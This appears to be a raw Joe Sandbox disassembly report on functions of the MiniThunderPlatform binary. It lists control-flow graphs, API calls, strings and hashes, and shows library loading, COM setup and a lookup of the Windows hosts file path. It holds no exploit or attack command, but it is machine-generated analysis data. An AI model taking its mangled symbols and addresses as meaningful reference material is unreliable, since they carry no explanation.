?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II 40011->40012 40013 1002688c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 40011->40013 40019 100267f2 40012->40019 40014 10025980 2 API calls 40013->40014 40015 100268e9 40014->40015 40016 10026847 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II 40016->40019 40017 10026800 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 40017->40019 40018 10026823 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 40018->40019 40019->40012 40019->40016 40019->40017 40019->40018 40020 10026888 40019->40020 40020->40013 40021 422db0 40022 422df1 40021->40022 40023 422e10 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40022->40023 40024 422e38 CloseHandle 40022->40024 40028 422e30 40023->40028 40025 418004 40024->40025 40026 422e4b ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40025->40026 40027 422e6b 40026->40027 40027->40028 40029 4255b0 40030 4182d4 40029->40030 40031 4255ec ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40030->40031 40032 425608 40031->40032 40033 425612 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40032->40033 40034 42562d 40033->40034 40035 425637 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W 40034->40035 40036 425658 40035->40036 40037 425699 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40036->40037 40038 4256b5 40037->40038 40039 425789 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40038->40039 40040 4256cc ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40038->40040 40041 418004 40039->40041 40049 4256e1 40040->40049 40042 4257a2 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40041->40042 40043 418004 40042->40043 40044 4257bb ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40043->40044 40045 418004 40044->40045 40046 4257d1 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40045->40046 40047 418004 40046->40047 40048 4257e7 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 40047->40048 40050 425800 40048->40050 40051 42570a ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40049->40051 40052 418004 40051->40052 40053 42571c ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40052->40053 40054 418004 40053->40054 40055 425732 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40054->40055 40056 418004 40055->40056 40057 425747 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 40056->40057 40058 42575a 40057->40058 40059 425767 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 40058->40059 40060 42577c 40059->40060 40060->40039 40061 1003d2f0 40066 1003d1d0 40061->40066 40064 1003d308 40065 1003d2ff ??3@YAXPAX 40065->40064 40067 1003d204 40066->40067 40074 100352a0 RtlEnterCriticalSection 40067->40074 40069 1003d22b 40070 1003d232 ??_V@YAXPAX 40069->40070 40073 1003d244 40069->40073 40070->40073 40071 1003d285 40071->40064 40071->40065 40072 1003d26a ??3@YAXPAX 40072->40071 40073->40071 40073->40072 40075 100348d0 40074->40075 40076 100352e6 RtlLeaveCriticalSection 40075->40076 40076->40069 40077 10055df0 40078 10055e07 inet_addr 40077->40078 40079 10055dfc 40077->40079 40083 10055e21 40078->40083 40093 10055d90 40079->40093 40081 10055e05 40084 10055e47 40083->40084 40100 10055120 95 API calls 40084->40100 40086 10055e4d 40087 10055e54 40086->40087 40088 10055e5f 40086->40088 40089 10055d90 130 API calls 40087->40089 40090 10059880 166 API calls 40088->40090 40091 10055e5d 40089->40091 40092 10055e65 40090->40092 40094 10055a20 116 API calls 40093->40094 40095 10055d9f 40094->40095 40097 10055950 104 API calls 40095->40097 40099 10055db1 40095->40099 40096 10055dbb SetEvent 40098 10055dc9 40096->40098 40097->40099 40098->40081 40099->40096 40099->40098 40100->40086

                                                                                                                                              Executed Functions

                                                                                                                                              Function 1001D704 Relevance: 60.0, APIs: 30, Strings: 4, Instructions: 501comsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 841 1001d704-1001d762 call 10025930 call 1001694c InterlockedIncrement 846 1001d764-1001d76c 841->846 847 1001d7ce-1001d806 CoInitializeEx CoCreateInstance 841->847 848 1001d7ac-1001d7bb InterlockedDecrement 846->848 849 1001d76e-1001d77b call 10025538 846->849 850 1001d808-1001d81b 847->850 851 1001d81d 847->851 852 1001d7c7-1001d7c9 848->852 853 1001d7bd-1001d7c1 RtlLeaveCriticalSection 848->853 860 1001d786-1001d7a7 call 1001c10b call 1001c6dc call 1001bc06 call 1001a1fa 849->860 861 1001d77d-1001d782 849->861 855 1001d81e-1001d8f3 call 10017235 call 100262b0 call 10017b7b call 10018110 call 1001819b call 10018226 call 100182b1 850->855 851->855 856 1001dded-1001de05 call 10025980 852->856 853->852 889 1001d8f9-1001d94b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z call 10013070 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 855->889 890 1001d9cd-1001d9cf call 1001c6dc 855->890 860->848 861->860 893 1001d9d4-1001d9dd call 10017007 889->893 896 1001d951-1001d9a0 call 1001a696 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z * 2 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 889->896 890->893 899 1001da73-1001da90 GetTickCount call 10031aa0 893->899 900 1001d9e3-1001d9fe call 10009f50 893->900 903 1001d9a2-1001d9af call 1001c13d 896->903 904 1001d9b4-1001d9c9 call 1001a6db 896->904 911 1001db23-1001db85 GetModuleHandleW ??0?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z GetModuleFileNameW 899->911 912 1001da96-1001dab1 call 10009f50 899->912 909 1001da00-1001da02 900->909 910 1001da06-1001da12 900->910 903->904 904->896 917 1001d9cb 904->917 909->910 914 1001da14-1001da16 910->914 915 1001da1a-1001da26 910->915 918 1001dc19-1001dc1f 911->918 919 1001db8b-1001dbae call 1001117c 911->919 929 1001dab3-1001dab5 912->929 930 1001dab9-1001dac5 912->930 914->915 923 1001da28-1001da2a 915->923 924 1001da2e-1001da3a 915->924 917->893 921 1001dc25-1001dd13 call 10013220 * 2 ?str@?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ call 100131c0 call 10013220 * 2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 918->921 922 1001dd19-1001dd44 ??_D?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ call 10009f50 918->922 926 1001dbb3-1001dc18 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z 919->926 921->922 943 1001dd46-1001dd48 922->943 944 1001dd4c-1001dd58 922->944 923->924 931 1001da42-1001da4d 924->931 932 1001da3c-1001da3e 924->932 926->918 929->930 933 1001dac7-1001dac9 930->933 934 1001dacd-1001dad9 930->934 935 1001da55-1001da5d 931->935 936 1001da4f-1001da51 931->936 932->931 933->934 939 1001dae1-1001daed 934->939 940 1001dadb-1001dadd 934->940 941 1001da69-1001da6e 935->941 942 1001da5f-1001da63 RtlLeaveCriticalSection 935->942 936->935 946 1001daf5-1001db00 939->946 947 1001daef-1001daf1 939->947 940->939 941->856 942->941 943->944 949 1001dd60-1001dd6c 944->949 950 1001dd5a-1001dd5c 944->950 951 1001db02-1001db04 946->951 952 1001db08-1001db10 946->952 947->946 953 1001dd74-1001dd80 949->953 954 1001dd6e-1001dd70 949->954 950->949 951->952 956 1001db12-1001db16 RtlLeaveCriticalSection 952->956 957 1001db1c-1001db1e 952->957 958 1001dd82-1001dd84 953->958 959 1001dd88-1001dd93 953->959 954->953 956->957 957->856 958->959 960 1001dd95-1001dd97 959->960 961 1001dd9b-1001dda7 959->961 960->961 963 1001ddb3-1001ddd1 WaitForSingleObject call 1001a1fa call 10017a80 961->963 964 1001dda9-1001ddad RtlLeaveCriticalSection 961->964 974 1001ddd3 963->974 975 1001ddd9-1001dde8 963->975 964->963 974->975 975->856
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001D709
                                                                                                                                                • Part of subcall function 1001694C: RtlEnterCriticalSection.NTDLL(?), ref: 1001695C
                                                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 1001D759
                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 1001D7AD
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001D7C1
                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000000), ref: 1001D7D0
                                                                                                                                              • CoCreateInstance.COMBASE(1029610C,00000000,00000001,1029611C,?), ref: 1001D7FA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1001D90B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D931
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1001D972
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1001D984
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,asyn_frame.dll), ref: 1001D996
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001DA63
                                                                                                                                                • Part of subcall function 1001C6DC: __EH_prolog.LIBCMT ref: 1001C6E1
                                                                                                                                                • Part of subcall function 1001C6DC: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(count), ref: 1001C70C
                                                                                                                                                • Part of subcall function 1001C6DC: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(com_plugin), ref: 1001C71F
                                                                                                                                                • Part of subcall function 1001C6DC: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C74A
                                                                                                                                                • Part of subcall function 1001C6DC: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C75A
                                                                                                                                                • Part of subcall function 1001C6DC: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(dll_), ref: 1001C78E
                                                                                                                                                • Part of subcall function 1001C6DC: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1001C7AF
                                                                                                                                                • Part of subcall function 1001C6DC: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C7BF
                                                                                                                                                • Part of subcall function 1001C6DC: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1001C7D1
                                                                                                                                                • Part of subcall function 1001C6DC: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(com_plugin), ref: 1001C7E2
                                                                                                                                                • Part of subcall function 1001C6DC: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,?), ref: 1001C818
                                                                                                                                                • Part of subcall function 1001C6DC: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C828
                                                                                                                                                • Part of subcall function 1001C6DC: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C838
                                                                                                                                                • Part of subcall function 1001C6DC: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C848
                                                                                                                                                • Part of subcall function 1001C6DC: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(clsid_), ref: 1001C856
                                                                                                                                              • GetTickCount.KERNEL32 ref: 1001DA73
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001DB16
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 1001DB3C
                                                                                                                                              • ??0?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000002,00000001), ref: 1001DB66
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 1001DB7D
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71(?,10277ABC,?,10277ABC,?,10277ABC,?,1027B15C), ref: 1001DBE1
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 1001DBEE
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 1001DBF4
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 1001DBFB
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 1001DC01
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 1001DC08
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 1001DC0E
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 1001DC15
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001DD13
                                                                                                                                              • ??_D?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 1001DD23
                                                                                                                                              • ?str@?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 1001DC8C
                                                                                                                                                • Part of subcall function 10009F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400,00000026), ref: 10009F65
                                                                                                                                                • Part of subcall function 10009F50: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400), ref: 10009F76
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001DDAD
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1001DDBB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@std@@@std@@$??0?$basic_string@$CriticalSectionV01@$??$?6??6?$basic_ostream@D@std@@@0@LeaveV10@V12@V12@@V?$basic_ostream@$?assign@?$basic_string@$H_prologInterlockedModuleV?$basic_string@$??$?8??0?$basic_ostringstream@??3@??4?$basic_string@?append@?$basic_string@?str@?$basic_ostringstream@CountCreateD?$basic_ostringstream@D@1@@std@@D@2@@0@D@2@@2@DecrementEnterFileHandleIncrementInitializeInstanceNameObjectSingleTickWait
                                                                                                                                              • String ID: asyn_frame.dll$env$product_flag$thunder_version
                                                                                                                                              • API String ID: 3075664540-691952345
                                                                                                                                              • Opcode ID: 68782e02d9a0ff45b462b692d48b5a291eca29301b16a3dfdcb496a8e18e4fd2
                                                                                                                                              • Instruction ID: 43ad9235691746cb3bcd4ac6290ed063ee86bf910e3fff22e7c745a696058275
                                                                                                                                              • Opcode Fuzzy Hash: 68782e02d9a0ff45b462b692d48b5a291eca29301b16a3dfdcb496a8e18e4fd2
                                                                                                                                              • Instruction Fuzzy Hash: 94223875905258DFCB61EBA4CC8CA9DBBB9EF19300F5045D9E44AEB251DB31AE84CF10
                                                                                                                                              Function 00437770 Relevance: 44.0, APIs: 18, Strings: 7, Instructions: 209COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1142 437770-43781e call 41714a call 4170c3 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ call 418004 call 41823e 1153 437820-437846 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 1142->1153 1154 43784b-4378b4 call 41714a call 4170c3 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ call 418004 call 41823e 1142->1154 1159 437a3f-437a6d call 417726 call 418004 1153->1159 1171 4378b9-4378be 1154->1171 1172 437901-43792a ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ call 418004 LoadLibraryW call 418004 1171->1172 1173 4378c0-4378fc ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 1171->1173 1182 437a03-437a39 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 1172->1182 1183 437930-437a01 GetProcAddress call 418004 GetProcAddress call 418004 GetProcAddress call 418004 GetProcAddress call 418004 GetProcAddress call 418004 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 1172->1183 1173->1159 1182->1159 1183->1159
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004377F4
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 00437806
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00437833
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00437894
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004378A6
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004378D0
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004378E9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_$?data@?$basic_string@_
                                                                                                                                              • String ID: XLBugHandler.dll$XLBugReport.exe$_XL_InitBugHandler@20$_XL_SetAlwaysSendReport@4$_XL_SetBugReportRootDir@4$_XL_SetPeerID@4$_XL_SetReportShowMode@4
                                                                                                                                              • API String ID: 855986704-2543232268
                                                                                                                                              • Opcode ID: fd97b4a9d2dd10f17b191d6b3a1f47f54e27affca514a7a6942c182d33c27001
                                                                                                                                              • Instruction ID: 7d2c1c8e8e835538649065c82bc670cb9795215914730fc2ebbfd3a8bac1ab38
                                                                                                                                              • Opcode Fuzzy Hash: fd97b4a9d2dd10f17b191d6b3a1f47f54e27affca514a7a6942c182d33c27001
                                                                                                                                              • Instruction Fuzzy Hash: FE81D8B1D00658DFDB60FBA4DC467CDBF74AF04318F11019AE859A7281DB395E88CB9A
                                                                                                                                              Function 1005CBA0 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 149fileCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1409 1005cba0-1005cc08 call 1005c9b0 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 1412 1005cc34-1005ccc2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10010810 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10010810 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1409->1412 1413 1005cc0a-1005cc2f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1409->1413 1421 1005ccc4-1005cce8 call 100013d0 1412->1421 1422 1005cd21-1005cd44 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z 1412->1422 1415 1005cd7d-1005cda2 call 10025980 1413->1415 1430 1005ccee-1005ccfd FindFirstFileA 1421->1430 1431 1005ccea 1421->1431 1424 1005cd46-1005cd4a 1422->1424 1425 1005cd68-1005cd7a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1422->1425 1428 1005cd4c 1424->1428 1429 1005cd5f-1005cd65 ??3@YAXPAX@Z 1424->1429 1426 1005cd7c 1425->1426 1426->1415 1432 1005cd50-1005cd5d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1428->1432 1429->1425 1433 1005cda3-1005cde0 FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 10009f50 1430->1433 1434 1005cd03-1005cd1f GetLastError ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1430->1434 1431->1430 1432->1429 1432->1432 1436 1005cde5-1005cdf9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1433->1436 1434->1421 1434->1422 1436->1426
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1005C9B0: ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 1005CA0E
                                                                                                                                                • Part of subcall function 1005C9B0: GetVersionExA.KERNEL32 ref: 1005CA28
                                                                                                                                                • Part of subcall function 1005C9B0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(\system32\drivers\etc\), ref: 1005CA48
                                                                                                                                                • Part of subcall function 1005C9B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1005CA55
                                                                                                                                                • Part of subcall function 1005C9B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CA7A
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?,00000020,00000024,00000000), ref: 1005CBFD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1005CC11
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CC27
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Hosts), ref: 1005CC53
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CC7A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(hosts), ref: 1005CC89
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 1005CCB0
